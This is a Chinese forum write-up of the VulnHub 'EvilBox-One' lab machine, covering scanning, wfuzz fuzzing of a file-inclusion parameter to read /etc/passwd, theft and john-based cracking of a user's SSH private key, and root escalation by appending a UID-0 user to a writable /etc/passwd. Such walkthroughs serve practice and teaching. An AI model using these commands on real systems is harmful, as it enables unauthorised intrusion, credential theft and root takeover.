本帖最后由 zhaorong 于 2022-6-14 14:28 编辑

1.靶机介绍

靶机地址下载：https://www.vulnhub.com/entry/evilbox-one,736/
靶机提示：
Description
Difficulty: Easy
This works better with VirtualBox rather than VMware。
靶机IP：10.8.1.119

2.端口发现

扫描靶机信息，发现开放了22、25、80、110端口。


3.目录扫描

目录扫描


查看/robots.txt得到提示Hello和H4x0r，一番尝试没有任何可利用。


访问/secret是空白页面，没有其他可以利用的了，那就只能再扫描下这个目录了


尝试扫描下/secret目录，换了3个工具，利用gobuster终于扫出来一个evil.php。



4.wfuzz参数爆破

访问evil.php，依然是个空白也么，那应该有参数。


利用wfuzz爆破一下参数，尝试下文件包含，查看下/etc/passwd，
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 0 http://10.8.1.119/se
cret/evil.php?FUZZ=../../../../../../../../etc/passwd得到参数command


利用正确的参数command查看下/etc/passwd，发现了用户mowree。


5.ssh私钥破解登录

查看下mowree用户的私钥，居然成功了。


将私钥保存到id_rsa，赋权600(权限太高无法执行)，利用ssh2john id_rsa > pass.txt编译私钥保存
利用john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt破解出密码unicorn。





指定id_rsa登录ssh，输入密码unicorn得到mowree的shell。


查看当前目录下的user,txt，得到fIag。


6.提权

一番查找之后没有任何线索，而之前的Hello和H4x0r也没有任何可利用的突然灵光一闪看
下/etc/passwd的权限吧，之前就遇到过可写入的情况，果然，哈哈。


perl -le 'print crypt("test","test")'先生成加盐的密码teH0wLIpW0gyQ。


echo toor:teH0wLIpW0gyQ:0:0:root:/root:/bin/bash >>/etc/passwd，写入具有root权限的
用户toor密码为test。查看/etc/passwd，成功写入


切换用户，得到root权限，拿到flag：36QtXfdJWvdC0VavlPIApUbDlqTsBM！


7.总结

打过很多靶机都会遇到/etc/passwd具有写入权限，拿到用户shell的时候，建议可以先执行sudo -l、查看
bash_history、查看/etc/passwd权限、查看系统版本信息、查看隐藏文件等等。